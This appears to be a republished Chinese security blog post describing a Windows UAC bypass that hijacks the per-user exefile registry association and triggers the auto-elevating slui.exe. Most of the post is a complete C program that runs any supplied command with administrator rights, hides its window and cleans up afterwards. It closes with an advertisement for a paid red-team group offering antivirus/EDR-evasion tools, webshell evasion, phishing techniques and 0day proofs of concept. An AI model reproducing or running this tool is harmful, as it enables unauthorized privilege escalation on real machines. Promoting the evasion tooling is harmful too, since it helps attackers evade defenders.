2026-03-05 19:38:34 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文介绍了一种利用Windows白名单进程slui.exe进行UAC提权的方法。通过修改注册表中exefile关联键值，劫持可执行文件打开方式，触发slui.exe的autoElevate属性实现高权限命令执行。文章提供了完整的C语言实现代码，包括注册表操作、进程启动和清理流程。该技术属于已公开的UAC绕过手法，适用于红队渗透测试场景，文末附带付费圈子推广内容。 综合评分： 70 文章分类： 内网渗透,红队,渗透测试,免杀,软文广告

cover_image

【UAC提权】白名单进程提权手法

原创

Hello888 Hello888

安全天书

2026年3月5日 10:01 广西

0x01 声明

本文所涉及的技术、思路和工具仅用于安全测试和防御研究，切勿将其用于非法入侵或攻击他人系统等目的，一切后果由使用者自行承担！！！

0x02 UAC介绍

slui.exe是一个具备autoElevate属性的微软自带工具，具有微软签名。该程序在执行过程中会将注册表的内容当作命令执行。

0x03 代码实现

#include&nbsp;<windows.h>#include&nbsp;<stdio.h>#include&nbsp;<stdlib.h>#pragma&nbsp;comment(lib,&nbsp;"advapi32.lib")#pragma&nbsp;comment(lib,&nbsp;"shell32.lib")// 注册表路径#define&nbsp;EXEFILE_REG_PATH&nbsp;L"Software\\Classes\\exefile\\Shell\\Open\\command"// 函数声明BOOL&nbsp;CreateExefileRegistryKey(LPCWSTR&nbsp;encodedCommand);BOOL&nbsp;RunSluiAndWait(void);BOOL&nbsp;CleanupExefileRegistry(void);BOOL&nbsp;IsElevated(void);void&nbsp;ShowLastError(const char*&nbsp;msg);void&nbsp;EncodeCommand(LPWSTR&nbsp;lpBuffer,&nbsp;DWORD&nbsp;dwSize,&nbsp;LPCWSTR&nbsp;lpCommand);// 显示最后一次错误信息void&nbsp;ShowLastError(const char*&nbsp;msg) {&nbsp; &nbsp;&nbsp;DWORD&nbsp;errorCode&nbsp;=&nbsp;GetLastError();&nbsp; &nbsp;&nbsp;LPWSTR&nbsp;errorMessage&nbsp;=&nbsp;NULL;&nbsp; &nbsp;&nbsp;FormatMessageW(&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;FORMAT_MESSAGE_ALLOCATE_BUFFER&nbsp;|&nbsp;FORMAT_MESSAGE_FROM_SYSTEM,&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;NULL, errorCode,&nbsp;0, (LPWSTR)&errorMessage,&nbsp;0,&nbsp;NULL&nbsp; &nbsp; );&nbsp; &nbsp;&nbsp;if&nbsp;(errorMessage) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[!] %s 失败，错误代码: %lu - %ws\n", msg, errorCode, errorMessage);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;LocalFree(errorMessage);&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; printf("[!] %s 失败，错误代码: %lu\n", msg, errorCode);&nbsp; &nbsp; }}// 检查当前进程是否以管理员权限运行BOOL&nbsp;IsElevated(void) {&nbsp; &nbsp;&nbsp;BOOL&nbsp;fRet&nbsp;=&nbsp;FALSE;&nbsp; &nbsp;&nbsp;HANDLE&nbsp;hToken&nbsp;=&nbsp;NULL;&nbsp; &nbsp;&nbsp;if&nbsp;(OpenProcessToken(GetCurrentProcess(),&nbsp;TOKEN_QUERY,&nbsp;&hToken)) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;TOKEN_ELEVATION&nbsp;elevation;&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;DWORD&nbsp;cbSize&nbsp;=&nbsp;sizeof(TOKEN_ELEVATION);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(GetTokenInformation(hToken,&nbsp;TokenElevation,&nbsp;&elevation, cbSize,&nbsp;&cbSize)) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; fRet&nbsp;=&nbsp;elevation.TokenIsElevated;&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;CloseHandle(hToken);&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;return&nbsp;fRet;}// 编码/构造要执行的命令// 默认格式: cmd.exe /c 要执行的命令void&nbsp;EncodeCommand(LPWSTR&nbsp;lpBuffer,&nbsp;DWORD&nbsp;dwSize,&nbsp;LPCWSTR&nbsp;lpCommand) {&nbsp; &nbsp;&nbsp;if&nbsp;(lpCommand&nbsp;==&nbsp;NULL&nbsp;||&nbsp;wcslen(lpCommand)&nbsp;==&nbsp;0) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 默认命令：打开管理员命令行窗口&nbsp; &nbsp; &nbsp; &nbsp; wcscpy_s(lpBuffer, dwSize,&nbsp;L"cmd.exe /k echo UAC Bypass Success! && whoami");&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 使用用户指定的命令&nbsp; &nbsp; &nbsp; &nbsp; swprintf_s(lpBuffer, dwSize,&nbsp;L"cmd.exe /c %s", lpCommand);&nbsp; &nbsp; }}// 创建exefile注册表键并设置命令BOOL&nbsp;CreateExefileRegistryKey(LPCWSTR&nbsp;encodedCommand) {&nbsp; &nbsp;&nbsp;HKEY&nbsp;hKey;&nbsp; &nbsp;&nbsp;DWORD&nbsp;dwDisposition;&nbsp; &nbsp;&nbsp;LONG&nbsp;result;&nbsp; &nbsp;&nbsp;BOOL&nbsp;success&nbsp;=&nbsp;FALSE;&nbsp; &nbsp; printf("[*] 打开注册表路径: HKCU\\Software\\Classes\\\n");&nbsp; &nbsp;&nbsp;// 打开 Software\Classes 键&nbsp; &nbsp; result&nbsp;=&nbsp;RegCreateKeyExW(&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;HKEY_CURRENT_USER,&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;L"Software\\Classes\\exefile\\Shell\\Open\\command",&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;0,&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;NULL,&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;REG_OPTION_NON_VOLATILE,&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;KEY_SET_VALUE&nbsp;|&nbsp;KEY_CREATE_SUB_KEY,&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;NULL,&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&hKey,&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&dwDisposition&nbsp; &nbsp; );&nbsp; &nbsp;&nbsp;if&nbsp;(result&nbsp;!=&nbsp;ERROR_SUCCESS) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[!] 创建/打开注册表键失败，错误: %ld\n", result);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;FALSE;&nbsp; &nbsp; }&nbsp; &nbsp; printf("[*] 键状态: %s\n", (dwDisposition&nbsp;==&nbsp;REG_CREATED_NEW_KEY)&nbsp;?&nbsp;"新建"&nbsp;:&nbsp;"已存在");&nbsp; &nbsp;&nbsp;// 设置默认值为编码后的命令&nbsp; &nbsp; result&nbsp;=&nbsp;RegSetValueExW(hKey,&nbsp;L"",&nbsp;0,&nbsp;REG_SZ, (const&nbsp;BYTE*)encodedCommand, (wcslen(encodedCommand)&nbsp;+&nbsp;1)&nbsp;*&nbsp;sizeof(WCHAR));&nbsp; &nbsp;&nbsp;if&nbsp;(result&nbsp;==&nbsp;ERROR_SUCCESS) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[+] 已设置默认值: %ws\n", encodedCommand);&nbsp; &nbsp; &nbsp; &nbsp; success&nbsp;=&nbsp;TRUE;&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; printf("[!] 设置注册表值失败，错误: %ld\n", result);&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;RegCloseKey(hKey);&nbsp; &nbsp;&nbsp;return&nbsp;success;}// 运行slui.exe并等待10秒BOOL&nbsp;RunSluiAndWait(void) {&nbsp; &nbsp;&nbsp;SHELLEXECUTEINFOW&nbsp;sei&nbsp;=&nbsp;{&nbsp;0&nbsp;};&nbsp; &nbsp;&nbsp;BOOL&nbsp;result;&nbsp; &nbsp;&nbsp;HANDLE&nbsp;hProcess&nbsp;=&nbsp;NULL;&nbsp; &nbsp; printf("[*] 正在启动 slui.exe 并请求管理员权限...\n");&nbsp; &nbsp; sei.cbSize&nbsp;=&nbsp;sizeof(SHELLEXECUTEINFOW);&nbsp; &nbsp; sei.fMask&nbsp;=&nbsp;SEE_MASK_NOCLOSEPROCESS; &nbsp;// 获取进程句柄以便等待&nbsp; &nbsp; sei.lpVerb&nbsp;=&nbsp;L"runas"; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 使用runas动词请求管理员权限&nbsp; &nbsp; sei.lpFile&nbsp;=&nbsp;L"C:\\windows\\system32\\slui.exe";&nbsp; &nbsp; sei.nShow&nbsp;=&nbsp;SW_HIDE; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 隐藏窗口&nbsp; &nbsp; result&nbsp;=&nbsp;ShellExecuteExW(&sei);&nbsp; &nbsp;&nbsp;if&nbsp;(!result) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;ShowLastError("ShellExecuteExW");&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;FALSE;&nbsp; &nbsp; }&nbsp; &nbsp; hProcess&nbsp;=&nbsp;sei.hProcess;&nbsp; &nbsp; printf("[+] slui.exe 已启动，进程句柄: %p\n", hProcess);&nbsp; &nbsp;&nbsp;if&nbsp;(hProcess) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[*] 等待 10 秒钟...\n");&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 等待10秒 (10000毫秒)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;DWORD&nbsp;waitResult&nbsp;=&nbsp;WaitForSingleObject(hProcess,&nbsp;10000);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(waitResult&nbsp;==&nbsp;WAIT_OBJECT_0) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; printf("[*] slui.exe 已退出\n");&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else&nbsp;if&nbsp;(waitResult&nbsp;==&nbsp;WAIT_TIMEOUT) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; printf("[*] 等待超时 (10秒)\n");&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; printf("[!] 等待进程时出错\n");&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;CloseHandle(hProcess);&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;return&nbsp;TRUE;}// 清理exefile注册表键BOOL&nbsp;CleanupExefileRegistry(void) {&nbsp; &nbsp;&nbsp;LONG&nbsp;result;&nbsp; &nbsp; printf("[*] 正在清理注册表...\n");&nbsp; &nbsp;&nbsp;// 先删除command子键&nbsp; &nbsp; result&nbsp;=&nbsp;RegDeleteKeyW(HKEY_CURRENT_USER,&nbsp;L"Software\\Classes\\exefile\\Shell\\Open\\command");&nbsp; &nbsp;&nbsp;if&nbsp;(result&nbsp;!=&nbsp;ERROR_SUCCESS&nbsp;&&&nbsp;result&nbsp;!=&nbsp;ERROR_FILE_NOT_FOUND) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[!] 删除command子键失败，错误: %ld\n", result);&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;// 删除Shell键&nbsp; &nbsp; result&nbsp;=&nbsp;RegDeleteKeyW(HKEY_CURRENT_USER,&nbsp;L"Software\\Classes\\exefile\\Shell");&nbsp; &nbsp;&nbsp;if&nbsp;(result&nbsp;!=&nbsp;ERROR_SUCCESS&nbsp;&&&nbsp;result&nbsp;!=&nbsp;ERROR_FILE_NOT_FOUND) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[!] 删除Shell键失败，错误: %ld\n", result);&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;// 删除exefile键&nbsp; &nbsp; result&nbsp;=&nbsp;RegDeleteKeyW(HKEY_CURRENT_USER,&nbsp;L"Software\\Classes\\exefile");&nbsp; &nbsp;&nbsp;if&nbsp;(result&nbsp;==&nbsp;ERROR_SUCCESS&nbsp;||&nbsp;result&nbsp;==&nbsp;ERROR_FILE_NOT_FOUND) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[+] 注册表清理完成\n");&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;TRUE;&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; printf("[!] 清理注册表失败，错误: %ld\n", result);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;FALSE;&nbsp; &nbsp; }}// 显示当前exefile注册表值void&nbsp;ShowCurrentExefileValue(void) {&nbsp; &nbsp;&nbsp;HKEY&nbsp;hKey;&nbsp; &nbsp;&nbsp;WCHAR&nbsp;szValue[1024]&nbsp;=&nbsp;L"";&nbsp; &nbsp;&nbsp;DWORD&nbsp;dwSize&nbsp;=&nbsp;sizeof(szValue);&nbsp; &nbsp;&nbsp;LONG&nbsp;result;&nbsp; &nbsp; result&nbsp;=&nbsp;RegOpenKeyExW(HKEY_CURRENT_USER,&nbsp;EXEFILE_REG_PATH,&nbsp;0,&nbsp;KEY_READ,&nbsp;&hKey);&nbsp; &nbsp;&nbsp;if&nbsp;(result&nbsp;==&nbsp;ERROR_SUCCESS) {&nbsp; &nbsp; &nbsp; &nbsp; result&nbsp;=&nbsp;RegQueryValueExW(hKey,&nbsp;L"",&nbsp;NULL,&nbsp;NULL, (LPBYTE)szValue,&nbsp;&dwSize);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(result&nbsp;==&nbsp;ERROR_SUCCESS) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; printf("[*] 当前exefile注册表值: %ws\n", szValue);&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; printf("[*] 当前exefile注册表值不存在或无法读取\n");&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;RegCloseKey(hKey);&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; printf("[*] exefile注册表键不存在\n");&nbsp; &nbsp; }}int main(int argc, char*&nbsp;argv[]) {&nbsp; &nbsp;&nbsp;WCHAR&nbsp;encodedCommand[1024]&nbsp;=&nbsp;L"";&nbsp; &nbsp;&nbsp;WCHAR&nbsp;userCommand[1024]&nbsp;=&nbsp;L"";&nbsp; &nbsp; int i;&nbsp; &nbsp; printf("[*] UAC绕过工具 - 通过修改exefile注册表关联劫持可执行文件\n");&nbsp; &nbsp; printf("[*] 当前进程ID: %lu\n",&nbsp;GetCurrentProcessId());&nbsp; &nbsp;&nbsp;// 检查是否已经是管理员权限&nbsp; &nbsp;&nbsp;if&nbsp;(IsElevated()) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[+] 当前已是管理员权限\n");&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; printf("[*] 当前不是管理员权限\n");&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;// 显示当前exefile注册表值&nbsp; &nbsp;&nbsp;ShowCurrentExefileValue();&nbsp; &nbsp;&nbsp;// 获取用户指定的命令（如果有）&nbsp; &nbsp;&nbsp;if&nbsp;(argc&nbsp;>&nbsp;1) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 将命令行参数拼接成字符串&nbsp; &nbsp; &nbsp; &nbsp; wcscpy_s(userCommand,&nbsp;1024,&nbsp;L"");&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;(i&nbsp;=&nbsp;1; i&nbsp;<&nbsp;argc; i++) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(i&nbsp;>&nbsp;1) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; wcscat_s(userCommand,&nbsp;1024,&nbsp;L" ");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 转换char*到WCHAR*&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;WCHAR&nbsp;wArg[256];&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;MultiByteToWideChar(CP_ACP,&nbsp;0, argv[i],&nbsp;-1, wArg,&nbsp;256);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; wcscat_s(userCommand,&nbsp;1024, wArg);&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; printf("[*] 用户指定的命令: %ws\n", userCommand);&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;else&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; printf("[*] 未指定命令，使用默认命令\n");&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;// 编码/构造要执行的命令&nbsp; &nbsp;&nbsp;EncodeCommand(encodedCommand,&nbsp;1024, (argc&nbsp;>&nbsp;1)&nbsp;?&nbsp;userCommand :&nbsp;NULL);&nbsp; &nbsp; printf("[*] 编码后的命令: %ws\n", encodedCommand);&nbsp; &nbsp; printf("\n[*] 步骤1: 创建exefile注册表键并设置命令\n");&nbsp; &nbsp;&nbsp;// 创建exefile注册表键并设置命令&nbsp; &nbsp;&nbsp;if&nbsp;(!CreateExefileRegistryKey(encodedCommand)) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[!] 创建注册表键失败，退出\n");&nbsp; &nbsp; &nbsp; &nbsp; system("pause");&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;1;&nbsp; &nbsp; }&nbsp; &nbsp; printf("\n[*] 步骤2: 启动slui.exe触发UAC提权\n");&nbsp; &nbsp;&nbsp;// 运行slui.exe并等待10秒&nbsp; &nbsp;&nbsp;if&nbsp;(!RunSluiAndWait()) {&nbsp; &nbsp; &nbsp; &nbsp; printf("[!] 启动slui.exe失败\n");&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;CleanupExefileRegistry();&nbsp; &nbsp; &nbsp; &nbsp; system("pause");&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;1;&nbsp; &nbsp; }&nbsp; &nbsp; printf("\n[*] 步骤3: 清理注册表\n");&nbsp; &nbsp;&nbsp;// 删除注册表键&nbsp; &nbsp;&nbsp;CleanupExefileRegistry();&nbsp; &nbsp; printf("\n[+] UAC绕过完成！\n");&nbsp; &nbsp; printf("[*] 说明: 当任何exe文件被运行时，将执行指定的命令\n");&nbsp; &nbsp; printf("[*] 注意: 这个修改可能会影响系统正常运行\n");&nbsp; &nbsp; system("pause");&nbsp; &nbsp;&nbsp;return&nbsp;0;}

0x04 红蓝偶像练习生小圈子

圈子主要研究方向渗透测试、红蓝对抗、钓鱼手法思路、武器化作，红队工具二开与免杀。圈内不定期分享红队技术文章，攻防经验总结，学习笔记以及自研工具与插件，目前圈子已满300人，欢迎各位进圈子交流学习！****

**圈子目前更新相关技术文章：

* HeavenlyBypassAV内部版-轻松免杀各大杀软

Heavenly白加黑自动化生成免杀工具
冰蝎webshell免杀工具
哥斯拉webshell免杀工具
红队场景下lnk钓鱼Bypass国内AV
Frp免杀隧道工具
1day和0dayPOC
lnk钓鱼思路视频讲解
lnk钓鱼Bypass天擎
msi钓鱼
chm钓鱼
Kill360核晶
AV对抗-致盲AV（核晶）
捆绑免杀360
Kill火绒
火绒6.0内存免杀
kill-windows Defender
Defender分离免杀
Defender知识点
HeavenlyProtectionCS内部CS插件
EDR对抗思路
进程注入知识点
自启动思路
多种维权手法
Fscan免杀核晶
QVM解决思路
红队思路-钓鱼环境下小窗口截屏窃取
免杀Todesk/向日葵读取工具
渗透测试文章思路
内网对抗文章思路
还有更多红队思路文章！期待您的加入！！！**

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全天书 Hello888 Hello888《【UAC提权】白名单进程提权手法》